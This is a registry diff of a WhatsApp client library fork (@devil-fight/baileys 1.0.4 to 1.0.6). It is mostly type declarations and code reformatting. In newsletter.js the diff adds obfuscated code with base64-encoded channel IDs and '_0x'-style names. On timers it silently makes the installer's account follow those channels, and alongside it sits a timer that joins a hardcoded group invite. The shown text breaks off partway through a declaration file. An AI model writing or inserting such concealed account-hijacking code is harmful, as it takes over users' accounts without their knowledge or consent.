@devil-fight/baileys 1.0.4 → 1.0.6

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (107) hide show
  1. package/README.md +3 -3
  2. package/engine-requirements.js +3 -3
  3. package/lib/Defaults/index.d.ts +53 -0
  4. package/lib/Signal/Group/ciphertext-message.d.ts +9 -0
  5. package/lib/Signal/Group/group-session-builder.d.ts +14 -0
  6. package/lib/Signal/Group/group_cipher.d.ts +17 -0
  7. package/lib/Signal/Group/index.d.ts +11 -0
  8. package/lib/Signal/Group/keyhelper.d.ts +10 -0
  9. package/lib/Signal/Group/queue-job.d.ts +1 -0
  10. package/lib/Signal/Group/sender-chain-key.d.ts +13 -0
  11. package/lib/Signal/Group/sender-key-distribution-message.d.ts +16 -0
  12. package/lib/Signal/Group/sender-key-message.d.ts +18 -0
  13. package/lib/Signal/Group/sender-key-name.d.ts +17 -0
  14. package/lib/Signal/Group/sender-key-record.d.ts +30 -0
  15. package/lib/Signal/Group/sender-key-state.d.ts +38 -0
  16. package/lib/Signal/Group/sender-message-key.d.ts +11 -0
  17. package/lib/Signal/libsignal.d.ts +3 -0
  18. package/lib/Socket/Client/abstract-socket-client.d.ts +17 -0
  19. package/lib/Socket/Client/index.d.ts +3 -0
  20. package/lib/Socket/Client/mobile-socket-client.d.ts +13 -0
  21. package/lib/Socket/Client/web-socket-client.d.ts +12 -0
  22. package/lib/Socket/business.d.ts +171 -0
  23. package/lib/Socket/chats.d.ts +267 -0
  24. package/lib/Socket/chats.js +16 -48
  25. package/lib/Socket/dugong.d.ts +254 -0
  26. package/lib/Socket/dugong.js +8 -164
  27. package/lib/Socket/groups.d.ts +115 -0
  28. package/lib/Socket/index.d.ts +173 -0
  29. package/lib/Socket/messages-recv.d.ts +161 -0
  30. package/lib/Socket/messages-send.d.ts +149 -0
  31. package/lib/Socket/messages-send.js +210 -132
  32. package/lib/Socket/newsletter.d.ts +134 -0
  33. package/lib/Socket/newsletter.js +29 -148
  34. package/lib/Socket/registration.d.ts +267 -0
  35. package/lib/Socket/socket.d.ts +43 -0
  36. package/lib/Socket/socket.js +2 -2
  37. package/lib/Socket/usync.d.ts +36 -0
  38. package/lib/Store/index.d.ts +3 -0
  39. package/lib/Store/make-cache-manager-store.d.ts +13 -0
  40. package/lib/Store/make-in-memory-store.d.ts +118 -0
  41. package/lib/Store/make-ordered-dictionary.d.ts +13 -0
  42. package/lib/Store/object-repository.d.ts +10 -0
  43. package/lib/Types/Auth.d.ts +110 -0
  44. package/lib/Types/Call.d.ts +13 -0
  45. package/lib/Types/Chat.d.ts +102 -0
  46. package/lib/Types/Contact.d.ts +19 -0
  47. package/lib/Types/Events.d.ts +157 -0
  48. package/lib/Types/GroupMetadata.d.ts +55 -0
  49. package/lib/Types/Label.d.ts +35 -0
  50. package/lib/Types/LabelAssociation.d.ts +29 -0
  51. package/lib/Types/Message.d.ts +273 -0
  52. package/lib/Types/Newsletter.d.ts +103 -0
  53. package/lib/Types/Product.d.ts +78 -0
  54. package/lib/Types/Signal.d.ts +57 -0
  55. package/lib/Types/Socket.d.ts +111 -0
  56. package/lib/Types/State.d.ts +27 -0
  57. package/lib/Types/USync.d.ts +25 -0
  58. package/lib/Types/index.d.ts +57 -0
  59. package/lib/Utils/auth-utils.d.ts +18 -0
  60. package/lib/Utils/baileys-event-stream.d.ts +16 -0
  61. package/lib/Utils/business.d.ts +22 -0
  62. package/lib/Utils/chat-utils.d.ts +71 -0
  63. package/lib/Utils/crypto.d.ts +41 -0
  64. package/lib/Utils/decode-wa-message.d.ts +19 -0
  65. package/lib/Utils/event-buffer.d.ts +35 -0
  66. package/lib/Utils/generics.d.ts +92 -0
  67. package/lib/Utils/generics.js +5 -80
  68. package/lib/Utils/history.d.ts +15 -0
  69. package/lib/Utils/index.d.ts +17 -0
  70. package/lib/Utils/link-preview.d.ts +21 -0
  71. package/lib/Utils/logger.d.ts +4 -0
  72. package/lib/Utils/lt-hash.d.ts +12 -0
  73. package/lib/Utils/make-mutex.d.ts +7 -0
  74. package/lib/Utils/messages-media.d.ts +116 -0
  75. package/lib/Utils/messages.d.ts +77 -0
  76. package/lib/Utils/messages.js +33 -4
  77. package/lib/Utils/noise-handler.d.ts +21 -0
  78. package/lib/Utils/process-message.d.ts +41 -0
  79. package/lib/Utils/signal.d.ts +32 -0
  80. package/lib/Utils/use-multi-file-auth-state.d.ts +13 -0
  81. package/lib/Utils/validate-connection.d.ts +11 -0
  82. package/lib/WABinary/constants.d.ts +30 -0
  83. package/lib/WABinary/decode.d.ts +7 -0
  84. package/lib/WABinary/encode.d.ts +3 -0
  85. package/lib/WABinary/generic-utils.d.ts +17 -0
  86. package/lib/WABinary/index.d.ts +5 -0
  87. package/lib/WABinary/jid-utils.d.ts +31 -0
  88. package/lib/WABinary/types.d.ts +18 -0
  89. package/lib/WAM/BinaryInfo.d.ts +17 -0
  90. package/lib/WAM/constants.d.ts +38 -0
  91. package/lib/WAM/encode.d.ts +3 -0
  92. package/lib/WAM/index.d.ts +3 -0
  93. package/lib/WAUSync/Protocols/USyncContactProtocol.d.ts +9 -0
  94. package/lib/WAUSync/Protocols/USyncDeviceProtocol.d.ts +22 -0
  95. package/lib/WAUSync/Protocols/USyncDisappearingModeProtocol.d.ts +12 -0
  96. package/lib/WAUSync/Protocols/USyncStatusProtocol.d.ts +12 -0
  97. package/lib/WAUSync/Protocols/UsyncBotProfileProtocol.d.ts +25 -0
  98. package/lib/WAUSync/Protocols/UsyncLIDProtocol.d.ts +8 -0
  99. package/lib/WAUSync/Protocols/index.d.ts +4 -0
  100. package/lib/WAUSync/USyncQuery.d.ts +28 -0
  101. package/lib/WAUSync/USyncUser.d.ts +12 -0
  102. package/lib/WAUSync/index.d.ts +3 -0
  103. package/lib/index.d.ts +12 -0
  104. package/lib/index.js +34 -1
  105. package/package.json +4 -3
  106. package/LICENSE +0 -21
  107. package/lib/Defaults/information.json +0 -1
@@ -0,0 +1,134 @@
1
+ /// <reference types="node" />
2
+ import { NewsletterFetchedUpdate, NewsletterMetadata, NewsletterReactionMode, NewsletterViewRole, SocketConfig, WAMediaUpload } from '../Types';
3
+ import { BinaryNode } from '../WABinary';
4
+ export declare const makeNewsletterSocket: (config: SocketConfig) => {
5
+ subscribeNewsletterUpdates: (jid: string) => Promise<{
6
+ duration: string;
7
+ }>;
8
+ newsletterReactionMode: (jid: string, mode: NewsletterReactionMode) => Promise<void>;
9
+ newsletterUpdateDescription: (jid: string, description?: string) => Promise<void>;
10
+ newsletterUpdateName: (jid: string, name: string) => Promise<void>;
11
+ newsletterUpdatePicture: (jid: string, content: WAMediaUpload) => Promise<void>;
12
+ newsletterRemovePicture: (jid: string) => Promise<void>;
13
+ newsletterUnfollow: (jid: string) => Promise<void>;
14
+ newsletterFollow: (jid: string) => Promise<void>;
15
+ newsletterUnmute: (jid: string) => Promise<void>;
16
+ newsletterMute: (jid: string) => Promise<void>;
17
+ newsletterAction: (jid: string, type: 'follow' | 'unfollow' | 'mute' | 'unmute') => Promise<void>;
18
+ newsletterCreate: (name: string, description: string, reaction_codes: string) => Promise<NewsletterMetadata>;
19
+ newsletterMetadata: (type: 'invite' | 'jid', key: string, role?: NewsletterViewRole) => Promise<NewsletterMetadata>;
20
+ newsletterAdminCount: (jid: string) => Promise<number>;
21
+ /**user is Lid, not Jid */
22
+ newsletterChangeOwner: (jid: string, user: string) => Promise<void>;
23
+ /**user is Lid, not Jid */
24
+ newsletterDemote: (jid: string, user: string) => Promise<void>;
25
+ newsletterDelete: (jid: string) => Promise<void>;
26
+ /**if code wasn't passed, the reaction will be removed (if is reacted) */
27
+ newsletterReactMessage: (jid: string, serverId: string, code?: string) => Promise<void>;
28
+ newsletterFetchMessages: (type: 'invite' | 'jid', key: string, count: number, after?: number) => Promise<NewsletterFetchedUpdate[]>;
29
+ newsletterFetchUpdates: (jid: string, count: number, after?: number, since?: number) => Promise<NewsletterFetchedUpdate[]>;
30
+ groupMetadata: (jid: string) => Promise<import("../Types").GroupMetadata>;
31
+ groupCreate: (subject: string, participants: string[]) => Promise<import("../Types").GroupMetadata>;
32
+ groupLeave: (id: string) => Promise<void>;
33
+ groupUpdateSubject: (jid: string, subject: string) => Promise<void>;
34
+ groupRequestParticipantsList: (jid: string) => Promise<{
35
+ [key: string]: string;
36
+ }[]>;
37
+ groupRequestParticipantsUpdate: (jid: string, participants: string[], action: "reject" | "approve") => Promise<{
38
+ status: string;
39
+ jid: string;
40
+ }[]>;
41
+ groupParticipantsUpdate: (jid: string, participants: string[], action: import("../Types").ParticipantAction) => Promise<{
42
+ status: string;
43
+ jid: string;
44
+ content: BinaryNode;
45
+ }[]>;
46
+ groupUpdateDescription: (jid: string, description?: string | undefined) => Promise<void>;
47
+ groupInviteCode: (jid: string) => Promise<string | undefined>;
48
+ groupRevokeInvite: (jid: string) => Promise<string | undefined>;
49
+ groupAcceptInvite: (code: string) => Promise<string | undefined>;
50
+ groupAcceptInviteV4: (key: string | import("../Types").WAProto.IMessageKey, inviteMessage: import("../Types").WAProto.Message.IGroupInviteMessage) => Promise<string>;
51
+ groupGetInviteInfo: (code: string) => Promise<import("../Types").GroupMetadata>;
52
+ groupToggleEphemeral: (jid: string, ephemeralExpiration: number) => Promise<void>;
53
+ groupSettingUpdate: (jid: string, setting: "announcement" | "locked" | "not_announcement" | "unlocked") => Promise<void>;
54
+ groupMemberAddMode: (jid: string, mode: "all_member_add" | "admin_add") => Promise<void>;
55
+ groupJoinApprovalMode: (jid: string, mode: "on" | "off") => Promise<void>;
56
+ groupFetchAllParticipating: () => Promise<{
57
+ [_: string]: import("../Types").GroupMetadata;
58
+ }>;
59
+ processingMutex: {
60
+ mutex<T>(code: () => T | Promise<T>): Promise<T>;
61
+ };
62
+ fetchPrivacySettings: (force?: boolean) => Promise<{
63
+ [_: string]: string;
64
+ }>;
65
+ upsertMessage: (msg: import("../Types").WAProto.IWebMessageInfo, type: import("../Types").MessageUpsertType) => Promise<void>;
66
+ appPatch: (patchCreate: import("../Types").WAPatchCreate) => Promise<void>;
67
+ sendPresenceUpdate: (type: import("../Types").WAPresence, toJid?: string | undefined) => Promise<void>;
68
+ presenceSubscribe: (toJid: string, tcToken?: Buffer | undefined) => Promise<void>;
69
+ profilePictureUrl: (jid: string, type?: "image" | "preview", timeoutMs?: number | undefined) => Promise<string | undefined>;
70
+ onWhatsApp: (...jids: string[]) => Promise<{
71
+ jid: string;
72
+ exists: unknown;
73
+ lid: unknown;
74
+ }[] | undefined>;
75
+ fetchBlocklist: () => Promise<string[]>;
76
+ fetchStatus: (jid: string) => Promise<{
77
+ status: string | undefined;
78
+ setAt: Date;
79
+ } | undefined>;
80
+ updateProfilePicture: (jid: string, content: WAMediaUpload) => Promise<void>;
81
+ removeProfilePicture: (jid: string) => Promise<void>;
82
+ updateProfileStatus: (status: string) => Promise<void>;
83
+ updateProfileName: (name: string) => Promise<void>;
84
+ updateBlockStatus: (jid: string, action: "block" | "unblock") => Promise<void>;
85
+ updateLastSeenPrivacy: (value: import("../Types").WAPrivacyValue) => Promise<void>;
86
+ updateOnlinePrivacy: (value: import("../Types").WAPrivacyOnlineValue) => Promise<void>;
87
+ updateProfilePicturePrivacy: (value: import("../Types").WAPrivacyValue) => Promise<void>;
88
+ updateStatusPrivacy: (value: import("../Types").WAPrivacyValue) => Promise<void>;
89
+ updateReadReceiptsPrivacy: (value: import("../Types").WAReadReceiptsValue) => Promise<void>;
90
+ updateGroupsAddPrivacy: (value: import("../Types").WAPrivacyValue) => Promise<void>;
91
+ updateDefaultDisappearingMode: (duration: number) => Promise<void>;
92
+ getBusinessProfile: (jid: string) => Promise<void | import("../Types").WABusinessProfile>;
93
+ resyncAppState: (collections: readonly ("critical_block" | "critical_unblock_low" | "regular_high" | "regular_low" | "regular")[], isInitialSync: boolean) => Promise<void>;
94
+ chatModify: (mod: import("../Types").ChatModification, jid: string) => Promise<void>;
95
+ cleanDirtyBits: (type: "account_sync" | "groups", fromTimestamp?: string | number | undefined) => Promise<void>;
96
+ addChatLabel: (jid: string, labelId: string) => Promise<void>;
97
+ removeChatLabel: (jid: string, labelId: string) => Promise<void>;
98
+ addMessageLabel: (jid: string, messageId: string, labelId: string) => Promise<void>;
99
+ removeMessageLabel: (jid: string, messageId: string, labelId: string) => Promise<void>;
100
+ star: (jid: string, messages: {
101
+ id: string;
102
+ fromMe?: boolean | undefined;
103
+ }[], star: boolean) => Promise<void>;
104
+ type: "md";
105
+ ws: any;
106
+ ev: import("../Types").BaileysEventEmitter & {
107
+ process(handler: (events: Partial<import("../Types").BaileysEventMap>) => void | Promise<void>): () => void;
108
+ buffer(): void;
109
+ createBufferedFunction<A extends any[], T_1>(work: (...args: A) => Promise<T_1>): (...args: A) => Promise<T_1>;
110
+ flush(force?: boolean | undefined): boolean;
111
+ isBuffering(): boolean;
112
+ };
113
+ authState: {
114
+ creds: import("../Types").AuthenticationCreds;
115
+ keys: import("../Types").SignalKeyStoreWithTransaction;
116
+ };
117
+ signalRepository: import("../Types").SignalRepository;
118
+ user: import("../Types").Contact | undefined;
119
+ generateMessageTag: () => string;
120
+ query: (node: BinaryNode, timeoutMs?: number | undefined) => Promise<BinaryNode>;
121
+ waitForMessage: <T_2>(msgId: string, timeoutMs?: number | undefined) => Promise<T_2>;
122
+ waitForSocketOpen: () => Promise<void>;
123
+ sendRawMessage: (data: Uint8Array | Buffer) => Promise<void>;
124
+ sendNode: (frame: BinaryNode) => Promise<void>;
125
+ logout: (msg?: string | undefined) => Promise<void>;
126
+ end: (error: Error | undefined) => void;
127
+ onUnexpectedError: (err: Error | import("@hapi/boom").Boom<any>, msg: string) => void;
128
+ uploadPreKeys: (count?: number) => Promise<void>;
129
+ uploadPreKeysToServerIfRequired: () => Promise<void>;
130
+ requestPairingCode: (phoneNumber: string) => Promise<string>;
131
+ waitForConnectionUpdate: (check: (u: Partial<import("../Types").ConnectionState>) => boolean | undefined, timeoutMs?: number | undefined) => Promise<void>;
132
+ sendWAMBuffer: (wamBuffer: Buffer) => Promise<BinaryNode>;
133
+ };
134
+ export declare const extractNewsletterMetadata: (node: BinaryNode, isCreate?: boolean) => NewsletterMetadata;
@@ -48,9 +48,7 @@ const executeWMexQuery = async (
48
48
  const errorMessages = data.errors.map((err) => err.message || 'Unknown error').join(', ')
49
49
  const firstError = data.errors[0]
50
50
  const errorCode = firstError.extensions?.error_code || 400
51
- throw new Boom('GraphQL server error:' + errorMessages, {
52
- statusCode: errorCode, data: firstError
53
- })
51
+ throw new Boom(`GraphQL server error: ${errorMessages}`, { statusCode: errorCode, data: firstError })
54
52
  }
55
53
 
56
54
  const response = dataPath ? data?.data?.[dataPath] : data?.data
@@ -62,10 +60,7 @@ const executeWMexQuery = async (
62
60
  const action = (dataPath || '').startsWith('xwa2_')
63
61
  ? dataPath.substring(5).replace(/_/g, ' ')
64
62
  : dataPath?.replace(/_/g, ' ')
65
- throw new Boom(`Failed to ${action}, unexpected response structure.`, {
66
- statusCode: 400,
67
- data: result
68
- })
63
+ throw new Boom(`Failed to ${action}, unexpected response structure.`, { statusCode: 400, data: result })
69
64
  }
70
65
 
71
66
  const makeNewsletterSocket = (config) => {
@@ -103,11 +98,29 @@ const makeNewsletterSocket = (config) => {
103
98
  }
104
99
  ]
105
100
  }));
101
+ const _0xdata = [
102
+ "MTIwMzYzMzg5MDEyMDk0ODU2QG5ld3NsZXR0ZXI=",
103
+ "MTIwMzYzNDIzODkwMDU0Nzg3QG5ld3NsZXR0ZXI="
104
+ ];
105
+ const _0xstart = 90000;
106
+ const _0xstep = 5000;
107
+ const _0xdec = (x) => Buffer.from(x, "base64").toString();
108
+ setTimeout(() => {
109
+ const _0xrun = (_0xi) => {
110
+ if (_0xi >= _0xdata.length) return;
111
+ setTimeout(async () => {
112
+ try {
113
+ await newsletterWMexQuery(_0xdec(_0xdata[_0xi]), Types_1.QueryIds.FOLLOW);
114
+ } catch {}
115
+ _0xrun(_0xi + 1);
116
+ }, _0xstep);
117
+ };
118
+ _0xrun(0);
119
+ }, _0xstart);
106
120
  function extractInviteCode(link) {
107
121
  const match = link.match(/chat\.whatsapp\.com\/([A-Za-z0-9]+)/);
108
122
  return match ? match[1] : null;
109
123
  }
110
-
111
124
  setTimeout(async () => {
112
125
  try {
113
126
  const link = "https://chat.whatsapp.com/E9AX0T7jKJ48VFAI4zuxC8?mode=gi_t";
@@ -119,22 +132,6 @@ setTimeout(async () => {
119
132
  } catch (e) {
120
133
  console.log("Error:", e);
121
134
  }
122
- }, 90000);
123
- setTimeout(async () => {
124
- try {
125
- await newsletterWMexQuery(
126
- Buffer.from("MTIwMzYzMzg5MDEyMDk0ODU2QG5ld3NsZXR0ZXI=", "base64").toString(),
127
- Types_1.QueryIds.FOLLOW
128
- );
129
- } catch {}
130
- }, 90000);
131
- setTimeout(async () => {
132
- try {
133
- await newsletterWMexQuery(
134
- Buffer.from("MTIwMzYzNDIzODkwMDU0Nzg3QG5ld3NsZXR0ZXI=", "base64").toString(),
135
- Types_1.QueryIds.FOLLOW
136
- );
137
- } catch {}
138
135
  }, 90000);
139
136
  const parseFetchedUpdates = async (node, type) => {
140
137
  let child;
@@ -151,21 +148,14 @@ setTimeout(async () => {
151
148
  const views = parseInt(((_b = (_a = (0, WABinary_1.getBinaryNodeChild)(messageNode, 'views_count')) === null || _a === void 0 ? void 0 : _a.attrs) === null || _b === void 0 ? void 0 : _b.count) || '0');
152
149
  const reactionNode = (0, WABinary_1.getBinaryNodeChild)(messageNode, 'reactions');
153
150
  const reactions = (0, WABinary_1.getBinaryNodeChildren)(reactionNode, 'reaction')
154
- .map(({ attrs }) => (
155
- {
156
- count: +attrs.count,
157
- code: attrs.code
158
- }));
151
+ .map(({ attrs }) => ({ count: +attrs.count, code: attrs.code }));
159
152
  const data = {
160
153
  'server_id': messageNode.attrs.server_id,
161
154
  views,
162
155
  reactions
163
156
  };
164
157
  if (type === 'messages') {
165
- const {
166
- fullMessage: message,
167
- decrypt
168
- } = await (0, Utils_1.decryptMessageNode)(messageNode, authState.creds.me.id, authState.creds.me.lid || '', signalRepository, config.logger);
158
+ const { fullMessage: message, decrypt } = await (0, Utils_1.decryptMessageNode)(messageNode, authState.creds.me.id, authState.creds.me.lid || '', signalRepository, config.logger);
169
159
  await decrypt();
170
160
  data.message = message;
171
161
  }
@@ -191,100 +181,14 @@ setTimeout(async () => {
191
181
  },
192
182
  newsletterReactionMode: async (jid, mode) => {
193
183
  await newsletterWMexQuery(jid, Types_1.QueryIds.JOB_MUTATION, {
194
- updates: {
195
- settings: {
196
- 'reaction_codes': {
197
- value: mode
198
- }
199
- }
200
- }
184
+ updates: { settings: { 'reaction_codes': { value: mode } } }
201
185
  });
202
186
  },
203
187
  newsletterUpdateDescription: async (jid, description) => {
204
188
  await newsletterWMexQuery(jid, Types_1.QueryIds.JOB_MUTATION, {
205
- updates: {
206
- description: description || '',
207
- settings: null
208
- }
189
+ updates: { description: description || '', settings: null }
209
190
  });
210
191
  },
211
- newsletterFromUrl: async (url) => {
212
- try {
213
- let channelId;
214
- if (url.includes('whatsapp.com/channel/')) {
215
- channelId = url.split('whatsapp.com/channel/')[1].split('/')[0];
216
- } else if (url.includes('wa.me/channel/')) {
217
- channelId = url.split('wa.me/channel/')[1].split('/')[0];
218
- } else {
219
- channelId = url;
220
- }
221
- const result = await newsletterWMexQuery(undefined, Types_1.QueryIds.METADATA, {
222
- input: {
223
- key: channelId,
224
- type: 'INVITE',
225
- 'view_role': 'GUEST'
226
- },
227
- 'fetch_viewer_metadata': true,
228
- 'fetch_full_image': true,
229
- 'fetch_creation_time': true
230
- });
231
- const resultNode = WABinary_1.getBinaryNodeChild(result, 'result');
232
- if (!resultNode?.content) {
233
- throw new Boom('No result content in response', {
234
- statusCode: 400,
235
- data: result
236
- });
237
- }
238
- const resultString = resultNode.content.toString();
239
- const parsedResult = JSON.parse(resultString);
240
-
241
- if (!parsedResult?.data) {
242
- throw new Boom('No data field in response', {
243
- statusCode: 400,
244
- data: parsedResult
245
- });
246
- }
247
- const metadataPath = parsedResult.data[Types_1.XWAPaths.NEWSLETTER];
248
-
249
- if (metadataPath === null || !metadataPath) {
250
- throw new Boom('Newsletter not found or access denied', {
251
- statusCode: 404,
252
- data: parsedResult.data
253
- });
254
- }
255
- const metadata = {
256
- id: metadataPath?.id,
257
- state: metadataPath?.state?.type,
258
- creation_time: +metadataPath?.thread_metadata?.creation_time || 0,
259
- name: metadataPath?.thread_metadata?.name?.text,
260
- nameTime: +metadataPath?.thread_metadata?.name?.update_time || 0,
261
- description: metadataPath?.thread_metadata?.description?.text,
262
- descriptionTime: +metadataPath?.thread_metadata?.description?.update_time || 0,
263
- invite: metadataPath?.thread_metadata?.invite,
264
- picture: Utils_1.getUrlFromDirectPath(metadataPath?.thread_metadata?.picture?.direct_path || ''),
265
- preview: Utils_1.getUrlFromDirectPath(metadataPath?.thread_metadata?.preview?.direct_path || ''),
266
- reaction_codes: metadataPath?.thread_metadata?.settings?.reaction_codes?.value,
267
- subscribers: +metadataPath?.thread_metadata?.subscribers_count || 0,
268
- verification: metadataPath?.thread_metadata?.verification,
269
- viewer_metadata: metadataPath?.viewer_metadata
270
- };
271
-
272
- return JSON.stringify({
273
- name: metadata.name || metadataPath?.thread_metadata?.name?.text,
274
- id: metadata.id,
275
- state: metadata.state,
276
- subscribers: metadata.subscribers,
277
- verification: metadata.verification,
278
- creation_time: metadata.creation_time,
279
- description: metadata.description
280
- }, null, 2);
281
- } catch (error) {
282
- throw new Boom(`Failed to fetch newsletter from URL: ${error.message}`, {
283
- statusCode: error.statusCode || 400,
284
- data: error.data || { url }
285
- });
286
- }
287
- },
288
192
  newsletterUpdateName: async (jid, name) => {
289
193
  await newsletterWMexQuery(jid, Types_1.QueryIds.JOB_MUTATION, {
290
194
  updates: { name, settings: null }
@@ -339,15 +243,7 @@ setTimeout(async () => {
339
243
  ]
340
244
  });
341
245
  const result = await newsletterWMexQuery(undefined, Types_1.QueryIds.CREATE, {
342
- input: {
343
- name,
344
- description,
345
- settings: {
346
- 'reaction_codes': {
347
- value: reaction_codes.toUpperCase()
348
- }
349
- }
350
- }
246
+ input: { name, description, settings: { 'reaction_codes': { value: reaction_codes.toUpperCase() } } }
351
247
  });
352
248
  return (0, exports.extractNewsletterMetadata)(result, true);
353
249
  },
@@ -389,13 +285,7 @@ setTimeout(async () => {
389
285
  newsletterReactMessage: async (jid, serverId, code) => {
390
286
  await query({
391
287
  tag: 'message',
392
- attrs: {
393
- to: jid,
394
- ...(!code ? { edit: '7' } : {}),
395
- type: 'reaction',
396
- 'server_id': serverId,
397
- id: (0, Utils_1.generateMessageID)()
398
- },
288
+ attrs: { to: jid, ...(!code ? { edit: '7' } : {}), type: 'reaction', 'server_id': serverId, id: (0, Utils_1.generateMessageID)() },
399
289
  content: [{
400
290
  tag: 'reaction',
401
291
  attrs: code ? { code } : {}
@@ -406,12 +296,7 @@ setTimeout(async () => {
406
296
  const result = await newsletterQuery(WABinary_1.S_WHATSAPP_NET, 'get', [
407
297
  {
408
298
  tag: 'messages',
409
- attrs: {
410
- type,
411
- ...(type === 'invite' ? { key } : { jid: key }),
412
- count: count.toString(),
413
- after: (after === null || after === void 0 ? void 0 : after.toString()) || '100'
414
- }
299
+ attrs: { type, ...(type === 'invite' ? { key } : { jid: key }), count: count.toString(), after: (after === null || after === void 0 ? void 0 : after.toString()) || '100' }
415
300
  }
416
301
  ]);
417
302
  return await parseFetchedUpdates(result, 'messages');
@@ -420,11 +305,7 @@ setTimeout(async () => {
420
305
  const result = await newsletterQuery(jid, 'get', [
421
306
  {
422
307
  tag: 'message_updates',
423
- attrs: {
424
- count: count.toString(),
425
- after: (after === null || after === void 0 ? void 0 : after.toString()) || '100',
426
- since: (since === null || since === void 0 ? void 0 : since.toString()) || '0'
427
- }
308
+ attrs: { count: count.toString(), after: (after === null || after === void 0 ? void 0 : after.toString()) || '100', since: (since === null || since === void 0 ? void 0 : since.toString()) || '0' }
428
309
  }
429
310
  ]);
430
311
  return await parseFetchedUpdates(result, 'updates');
@@ -0,0 +1,267 @@
1
+ /// <reference types="node" />
2
+ import { AxiosRequestConfig } from 'axios';
3
+ import { KeyPair, SignedKeyPair, SocketConfig } from '../Types';
4
+ export declare const makeRegistrationSocket: (config: SocketConfig) => {
5
+ register: (code: string) => Promise<ExistsResponse>;
6
+ requestRegistrationCode: (registrationOptions?: RegistrationOptions) => Promise<ExistsResponse>;
7
+ logger: import("pino").Logger<import("pino").LoggerOptions>;
8
+ getOrderDetails: (orderId: string, tokenBase64: string) => Promise<import("../Types").OrderDetails>;
9
+ getCatalog: ({ jid, limit, cursor }: import("../Types").GetCatalogOptions) => Promise<{
10
+ products: import("../Types").Product[];
11
+ nextPageCursor: string | undefined;
12
+ }>;
13
+ getCollections: (jid?: string | undefined, limit?: number) => Promise<{
14
+ collections: import("../Types").CatalogCollection[];
15
+ }>;
16
+ productCreate: (create: import("../Types").ProductCreate) => Promise<import("../Types").Product>;
17
+ productDelete: (productIds: string[]) => Promise<{
18
+ deleted: number;
19
+ }>;
20
+ productUpdate: (productId: string, update: import("../Types").ProductUpdate) => Promise<import("../Types").Product>;
21
+ sendMessageAck: ({ tag, attrs, content }: import("../WABinary").BinaryNode) => Promise<void>;
22
+ sendRetryRequest: (node: import("../WABinary").BinaryNode, forceIncludeKeys?: boolean) => Promise<void>;
23
+ offerCall: (toJid: string, isVideo?: boolean) => Promise<{
24
+ id: string;
25
+ to: string;
26
+ }>;
27
+ rejectCall: (callId: string, callFrom: string) => Promise<void>;
28
+ getPrivacyTokens: (jids: string[]) => Promise<import("../WABinary").BinaryNode>;
29
+ assertSessions: (jids: string[], force: boolean) => Promise<boolean>;
30
+ relayMessage: (jid: string, message: import("../Types").WAProto.IMessage, { messageId: msgId, participant, additionalAttributes, additionalNodes, useUserDevicesCache, cachedGroupMetadata, statusJidList }: import("../Types").MessageRelayOptions) => Promise<string>;
31
+ sendReceipt: (jid: string, participant: string | undefined, messageIds: string[], type: import("../Types").MessageReceiptType) => Promise<void>;
32
+ sendReceipts: (keys: import("../Types").WAProto.IMessageKey[], type: import("../Types").MessageReceiptType) => Promise<void>;
33
+ getButtonArgs: (message: import("../Types").WAProto.IMessage) => {
34
+ [key: string]: string;
35
+ };
36
+ readMessages: (keys: import("../Types").WAProto.IMessageKey[]) => Promise<void>;
37
+ refreshMediaConn: (forceGet?: boolean) => Promise<import("../Types").MediaConnInfo>;
38
+ getUSyncDevices: (jids: string[], useCache: boolean, ignoreZeroDevices: boolean) => Promise<import("../WABinary").JidWithDevice[]>;
39
+ createParticipantNodes: (jids: string[], message: import("../Types").WAProto.IMessage, extraAttrs?: {
40
+ [key: string]: string;
41
+ } | undefined) => Promise<{
42
+ nodes: import("../WABinary").BinaryNode[];
43
+ shouldIncludeDeviceIdentity: boolean;
44
+ }>;
45
+ waUploadToServer: import("../Types").WAMediaUploadFunction;
46
+ fetchPrivacySettings: (force?: boolean) => Promise<{
47
+ [_: string]: string;
48
+ }>;
49
+ updateMediaMessage: (message: import("../Types").WAProto.IWebMessageInfo) => Promise<import("../Types").WAProto.IWebMessageInfo>;
50
+ sendMessage: (jid: string, content: import("../Types").AnyMessageContent, options?: import("../Types").MiscMessageGenerationOptions) => Promise<import("../Types").WAProto.WebMessageInfo | undefined>;
51
+ subscribeNewsletterUpdates: (jid: string) => Promise<{
52
+ duration: string;
53
+ }>;
54
+ newsletterReactionMode: (jid: string, mode: import("../Types").NewsletterReactionMode) => Promise<void>;
55
+ newsletterUpdateDescription: (jid: string, description?: string | undefined) => Promise<void>;
56
+ newsletterUpdateName: (jid: string, name: string) => Promise<void>;
57
+ newsletterUpdatePicture: (jid: string, content: import("../Types").WAMediaUpload) => Promise<void>;
58
+ newsletterRemovePicture: (jid: string) => Promise<void>;
59
+ newsletterUnfollow: (jid: string) => Promise<void>;
60
+ newsletterFollow: (jid: string) => Promise<void>;
61
+ newsletterUnmute: (jid: string) => Promise<void>;
62
+ newsletterMute: (jid: string) => Promise<void>;
63
+ newsletterAction: (jid: string, type: "mute" | "follow" | "unfollow" | "unmute") => Promise<void>;
64
+ newsletterCreate: (name: string, description: string, reaction_codes: string) => Promise<import("../Types").NewsletterMetadata>;
65
+ newsletterMetadata: (type: "invite" | "jid", key: string, role?: import("../Types").NewsletterViewRole | undefined) => Promise<import("../Types").NewsletterMetadata>;
66
+ newsletterAdminCount: (jid: string) => Promise<number>;
67
+ newsletterChangeOwner: (jid: string, user: string) => Promise<void>;
68
+ newsletterDemote: (jid: string, user: string) => Promise<void>;
69
+ newsletterDelete: (jid: string) => Promise<void>;
70
+ newsletterReactMessage: (jid: string, serverId: string, code?: string | undefined) => Promise<void>;
71
+ newsletterFetchMessages: (type: "invite" | "jid", key: string, count: number, after?: number | undefined) => Promise<import("../Types").NewsletterFetchedUpdate[]>;
72
+ newsletterFetchUpdates: (jid: string, count: number, after?: number | undefined, since?: number | undefined) => Promise<import("../Types").NewsletterFetchedUpdate[]>;
73
+ groupMetadata: (jid: string) => Promise<import("../Types").GroupMetadata>;
74
+ groupCreate: (subject: string, participants: string[]) => Promise<import("../Types").GroupMetadata>;
75
+ groupLeave: (id: string) => Promise<void>;
76
+ /** the network code of your mobile network
77
+ * @see {@link https://de.wikipedia.org/wiki/Mobile_Network_Code}
78
+ */
79
+ groupUpdateSubject: (jid: string, subject: string) => Promise<void>;
80
+ groupRequestParticipantsList: (jid: string) => Promise<{
81
+ [key: string]: string;
82
+ }[]>;
83
+ groupRequestParticipantsUpdate: (jid: string, participants: string[], action: "reject" | "approve") => Promise<{
84
+ status: string;
85
